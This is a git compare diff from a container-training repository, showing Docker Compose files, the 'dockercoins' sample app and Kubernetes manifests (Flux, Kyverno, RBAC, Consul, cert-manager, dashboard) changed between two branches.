Compare commits

..

1 Commits
main ... gitpod

Author SHA1 Message Date
Jerome Petazzoni
8dacf00bf3 Test gitpod 2020-04-03 10:56:39 -05:00
815 changed files with 12786 additions and 79403 deletions

View File

@@ -1,26 +0,0 @@
{
"name": "container.training environment to get started with Docker and/or Kubernetes",
"image": "ghcr.io/jpetazzo/shpod",
"features": {
//"ghcr.io/devcontainers/features/common-utils:2": {}
},
// Use 'forwardPorts' to make a list of ports inside the container available locally.
"forwardPorts": [],
//"postCreateCommand": "... install extra packages...",
"postStartCommand": "dind.sh ; kind.sh",
// This lets us use "docker-outside-docker".
// Unfortunately, minikube, kind, etc. don't work very well that way;
// so for now, we'll likely use "docker-in-docker" instead (with a
// privilege dcontainer). But we're still exposing that socket in case
// someone wants to do something interesting with it.
"mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],
// This is for docker-in-docker.
"privileged": true,
// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
"remoteUser": "k8s"
}

17
.gitignore vendored
View File

@@ -1,24 +1,14 @@
*.pyc
*.swp
*~
**/terraform.tfstate
**/terraform.tfstate.backup
prepare-labs/terraform/lab-environments
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
prepare-labs/www
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
slides/_academy_*
slides/fragments
node_modules
### macOS ###
@@ -32,4 +22,3 @@ node_modules
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

1
.gitpod.yml Normal file
View File

@@ -0,0 +1 @@
image: jpetazzo/shpod

View File

@@ -1,3 +1,2 @@
hostname frr
ip nht resolve-via-default
log stdout

View File

@@ -2,36 +2,30 @@ version: "3"
services:
bgpd:
image: frrouting/frr:v8.2.2
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel --no_zebra
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: frrouting/frr:v8.2.2
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: frrouting/frr:v8.2.2
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine

View File

@@ -9,21 +9,21 @@ services:
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,6 +1,3 @@
# Note: hyperkube isn't available after Kubernetes 1.18.
# So we'll have to update this for Kubernetes 1.19!
version: "3"
services:
@@ -12,20 +9,20 @@ services:
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,72 +0,0 @@
# (1) Setting up a registry, and telling Tilt to use it.
# Tilt needs a registry to store images.
# The following manifest defines a Deployment to run a basic Docker registry,
# and a NodePort Service to access it. Using a NodePort means that we don't
# need to obtain a TLS certificate, because we will be accessing the registry
# through localhost.
k8s_yaml('../k8s/tilt-registry.yaml')
# Tell Tilt to use the registry that we just deployed instead of whatever
# is defined in our Kubernetes resources. Tilt will patch image names to
# use our registry.
default_registry('localhost:30555')
# Create a port forward so that we can access the registry from our local
# environment, too. Note that if you run Tilt directly from a Kubernetes node
# (which is not typical, but might happen in some lab/training environments)
# the following might cause an error because port 30555 is already taken.
k8s_resource(workload='tilt-registry', port_forwards='30555:5000')
# (2) Telling Tilt how to build and run our app.
# The following two lines will use the kubectl-build plugin
# to leverage buildkit and build the images in our Kubernetes
# cluster. This is not enabled by default, because it requires
# the plugin to be installed.
# See https://github.com/vmware-tanzu/buildkit-cli-for-kubectl
# for more information about this plugin.
#load('ext://kubectl_build', 'kubectl_build')
#docker_build = kubectl_build
# Our Kubernetes manifests use images 'dockercoins/...' so we tell Tilt
# how each of these images should be built. The first argument is the name
# of the image, the second argument is the directory containing the build
# context (i.e. the Dockerfile to build the image).
docker_build('dockercoins/hasher', 'hasher')
docker_build('dockercoins/rng', 'rng')
docker_build('dockercoins/webui', 'webui')
docker_build('dockercoins/worker', 'worker')
# The following manifests defines five Deployments and four Services for
# our application.
k8s_yaml('../k8s/dockercoins.yaml')
# (3) Finishing touches.
# The following line lets Tilt run with the default kubeadm cluster-admin context.
allow_k8s_contexts('kubernetes-admin@kubernetes')
# Note: the whole section below (to set up ngrok tunnels) is disabled,
# because ngrok now requires to set up an account to serve HTML
# content. So we can still use ngrok for e.g. webhooks and "raw" APIs,
# but not to serve web pages like the Tilt UI.
# # This will run an ngrok tunnel to expose Tilt to the outside world.
# # This is intended to be used when Tilt runs on a remote machine.
# local_resource(name='ngrok:tunnel', serve_cmd='ngrok http 10350')
# # This will wait until the ngrok tunnel is up, and show its URL to the user.
# # We send the output to /dev/tty so that it doesn't get intercepted by
# # Tilt, and gets displayed to the user's terminal instead.
# # Note: this assumes that the ngrok instance will be running on port 4040.
# # If you have other ngrok instances running on the machine, this might not work.
# local_resource(name='ngrok:showurl', cmd='''
# while sleep 1; do
# TUNNELS=$(curl -fsSL http://localhost:4040/api/tunnels | jq -r .tunnels[].public_url)
# [ "$TUNNELS" ] && break
# done
# printf "\nYou should be able to connect to the Tilt UI with the following URL(s): %s\n" "$TUNNELS" >/dev/tty
# '''
# )

View File

@@ -1,24 +1,26 @@
services:
version: "2"
services:
rng:
build: rng
ports:
- "8001:80"
- "8001:80"
hasher:
build: hasher
ports:
- "8002:80"
- "8002:80"
webui:
build: webui
ports:
- "8000:80"
- "8000:80"
volumes:
- "./webui/files/:/files/"
- "./webui/files/:/files/"
redis:
image: redis
worker:
build: worker

View File

@@ -1,8 +1,7 @@
FROM ruby:alpine
WORKDIR /app
RUN apk add --update build-base curl
RUN gem install sinatra --version '~> 3'
RUN gem install sinatra
RUN gem install thin
COPY hasher.rb .
CMD ["ruby", "hasher.rb", "-o", "::"]
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80

View File

@@ -2,6 +2,7 @@ require 'digest'
require 'sinatra'
require 'socket'
set :bind, '0.0.0.0'
set :port, 80
post '/' do

View File

@@ -1,7 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install Flask
COPY rng.py .
ENV FLASK_APP=rng FLASK_RUN_HOST=:: FLASK_RUN_PORT=80
CMD ["flask", "run", "--without-threads"]
COPY rng.py /
CMD ["python", "rng.py"]
EXPOSE 80

View File

@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(port=80)
app.run(host="0.0.0.0", port=80, threaded=False)

View File

@@ -1,8 +1,7 @@
FROM node:23-alpine
WORKDIR /app
FROM node:4-slim
RUN npm install express
RUN npm install morgan
RUN npm install redis@5
COPY . .
RUN npm install redis
COPY files/ /files/
COPY webui.js /
CMD ["node", "webui.js"]
EXPOSE 80

View File

@@ -13,7 +13,7 @@
color: royalblue;
}
</style>
<script src="jquery-1.11.3.min.js"></script>
<script src="jquery.js"></script>
<script src="d3.min.js"></script>
<script src="rickshaw.min.js"></script>
<script>

1
dockercoins/webui/files/jquery.js vendored Symbolic link
View File

@@ -0,0 +1 @@
jquery-1.11.3.min.js

View File

@@ -1,34 +1,26 @@
import express from 'express';
import morgan from 'morgan';
import { createClient } from 'redis';
var client = await createClient({
url: "redis://redis",
socket: {
family: 0
}
})
.on("error", function (err) {
console.error("Redis error", err);
})
.connect();
var express = require('express');
var app = express();
var redis = require('redis');
app.use(morgan('common'));
var client = redis.createClient(6379, 'redis');
client.on("error", function (err) {
console.error("Redis error", err);
});
app.get('/', function (req, res) {
res.redirect('/index.html');
});
app.get('/json', async(req, res) => {
var coins = await client.hLen('wallet');
var hashes = await client.get('hashes');
var now = Date.now() / 1000;
res.json({
coins: coins,
hashes: hashes,
now: now
app.get('/json', function (req, res) {
client.hlen('wallet', function (err, coins) {
client.get('hashes', function (err, hashes) {
var now = Date.now() / 1000;
res.json( {
coins: coins,
hashes: hashes,
now: now
});
});
});
});

View File

@@ -1,6 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install redis
RUN pip install requests
COPY worker.py .
COPY worker.py /
CMD ["python", "worker.py"]

View File

@@ -1,9 +0,0 @@
apiVersion: v1
kind: ConfigMap
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
data:
use-forwarded-headers: true
compute-full-forwarded-for: true
use-proxy-protocol: true

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: ingress-nginx

View File

@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- M6-ingress-nginx-components.yaml
- sync.yaml
patches:
- path: M6-ingress-nginx-cm-patch.yaml
target:
kind: ConfigMap
- path: M6-ingress-nginx-svc-patch.yaml
target:
kind: Service

View File

@@ -1,8 +0,0 @@
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
annotations:
service.beta.kubernetes.io/scw-loadbalancer-proxy-protocol-v2: true
service.beta.kubernetes.io/scw-loadbalancer-use-hostname: true

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: kyverno

View File

@@ -1,72 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: flux-multi-tenancy
spec:
validationFailureAction: enforce
rules:
- name: serviceAccountName
exclude:
resources:
namespaces:
- flux-system
match:
resources:
kinds:
- Kustomization
- HelmRelease
validate:
message: ".spec.serviceAccountName is required"
pattern:
spec:
serviceAccountName: "?*"
- name: kustomizationSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- Kustomization
preconditions:
any:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"
- name: helmReleaseSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- HelmRelease
preconditions:
any:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.chart.spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: monitoring
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: grafana
namespace: monitoring
spec:
ingressClassName: nginx
rules:
- host: grafana.test.metal.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: kube-prometheus-stack-grafana
port:
number: 80

View File

@@ -1,35 +0,0 @@
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: web
ingress:
- from: []
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-db
spec:
podSelector:
matchLabels:
app: db
ingress:
- from:
- podSelector:
matchLabels:
app: web

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: openebs

View File

@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
namespace: openebs
resources:
- M6-openebs-components.yaml
- sync.yaml
configMapGenerator:
- name: openebs-values
files:
- values.yaml=M6-openebs-values.yaml
configurations:
- M6-openebs-kustomizeconfig.yaml

View File

@@ -1,6 +0,0 @@
nameReference:
- kind: ConfigMap
version: v1
fieldSpecs:
- path: spec/valuesFrom/name
kind: HelmRelease

View File

@@ -1,15 +0,0 @@
# helm install openebs --namespace openebs openebs/openebs
# --set engines.replicated.mayastor.enabled=false
# --set lvm-localpv.lvmNode.kubeletDir=/var/lib/k0s/kubelet/
# --create-namespace
engines:
replicated:
mayastor:
enabled: false
# Needed for k0s install since kubelet install is slightly divergent from vanilla install >:-(
lvm-localpv:
lvmNode:
kubeletDir: /var/lib/k0s/kubelet/
localprovisioner:
hostpathClass:
isDefaultClass: true

View File

@@ -1,38 +0,0 @@
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
namespace: rocky-test
name: rocky-full-access
rules:
- apiGroups: ["", extensions, apps]
resources: [deployments, replicasets, pods, services, ingresses, statefulsets]
verbs: [get, list, watch, create, update, patch, delete] # You can also use [*]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: rocky-pv-access
rules:
- apiGroups: [""]
resources: [persistentvolumes]
verbs: [get, list, watch, create, patch]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
toolkit.fluxcd.io/tenant: rocky
name: rocky-reconciler2
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: rocky-pv-access
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: User
name: gotk:rocky-test:reconciler
- kind: ServiceAccount
name: rocky
namespace: rocky-test

View File

@@ -1,19 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: rocky
namespace: rocky-test
spec:
ingressClassName: nginx
rules:
- host: rocky.test.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: web
port:
number: 80

View File

@@ -1,8 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../../base/rocky
patches:
- path: M6-rocky-test-patch.yaml
target:
kind: Kustomization

View File

@@ -1,7 +0,0 @@
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
name: rocky
namespace: rocky-test
spec:
path: ./k8s/plain

View File

@@ -1,8 +0,0 @@
k8s_yaml(helm(
"./path-to-chart", name="blue",
values=[], # Example: ["./path/to/values.yaml"]
set=[
"image.repository=jpetazzo/color",
"image.tag=latest",
]
))

View File

@@ -1,16 +0,0 @@
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
configuration:
apiVersion: pod-security.admission.config.k8s.io/v1alpha1
kind: PodSecurityConfiguration
defaults:
enforce: baseline
audit: baseline
warn: baseline
exemptions:
usernames:
- cluster-admin
namespaces:
- kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 1
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- name: "80"
port: 80
selector:
app: blue

View File

@@ -1,36 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: certbot
spec:
ports:
- port: 80
protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: certbot
spec:
rules:
- http:
paths:
- path: /.well-known/acme-challenge/
pathType: Prefix
backend:
service:
name: certbot
port:
number: 80
---
apiVersion: v1
kind: Endpoints
metadata:
name: certbot
subsets:
- addresses:
- ip: A.B.C.D
ports:
- port: 8000
protocol: TCP

View File

@@ -1,11 +0,0 @@
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: xyz.A.B.C.D.nip.io
spec:
secretName: xyz.A.B.C.D.nip.io
dnsNames:
- xyz.A.B.C.D.nip.io
issuerRef:
name: letsencrypt-staging
kind: ClusterIssuer

View File

@@ -1,18 +0,0 @@
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# Remember to update this if you use this manifest to obtain real certificates :)
email: hello@example.com
server: https://acme-staging-v02.api.letsencrypt.org/directory
# To use the production environment, use the following line instead:
#server: https://acme-v02.api.letsencrypt.org/directory
privateKeySecretRef:
name: issuer-letsencrypt-staging
solvers:
- http01:
ingress:
class: traefik

View File

@@ -1,6 +1,3 @@
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
# for reference, but it's not intended to be used in modern trainings.
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:

View File

@@ -4,13 +4,6 @@ metadata:
name: coffees.container.training
spec:
group: container.training
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
scope: Namespaced
names:
plural: coffees
@@ -18,4 +11,25 @@ spec:
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
properties:
spec:
required:
- taste
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date

View File

@@ -1,37 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
required: [ taste ]
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date

View File

@@ -9,9 +9,9 @@ spec:
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
name: robusta
spec:
taste: fruity
taste: stronger
---
kind: Coffee
apiVersion: container.training/v1alpha1
@@ -23,12 +23,7 @@ spec:
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
name: excelsa
spec:
taste: stronger
bitterness: high
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: java
taste: fruity

View File

@@ -1,78 +0,0 @@
# Basic Consul cluster using Cloud Auto-Join.
# Caveats:
# - no actual persistence
# - scaling down to 1 will break the cluster
# - pods may be colocated
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"

View File

@@ -1,99 +0,0 @@
# Even better Consul cluster.
# That one uses a volumeClaimTemplate to achieve true persistence.
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
volumeMounts:
- name: data
mountPath: /consul/data
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]

View File

@@ -1,15 +1,5 @@
# Better Consul cluster.
# There is still no actual persistence, but:
# - podAntiaffinity prevents pod colocation
# - clusters works when scaling down to 1 (thanks to lifecycle hook)
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
kind: ClusterRole
metadata:
name: consul
rules:
@@ -21,16 +11,22 @@ rules:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
@@ -63,22 +59,20 @@ spec:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: "consul:1.6"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
@@ -86,4 +80,7 @@ spec:
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,340 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
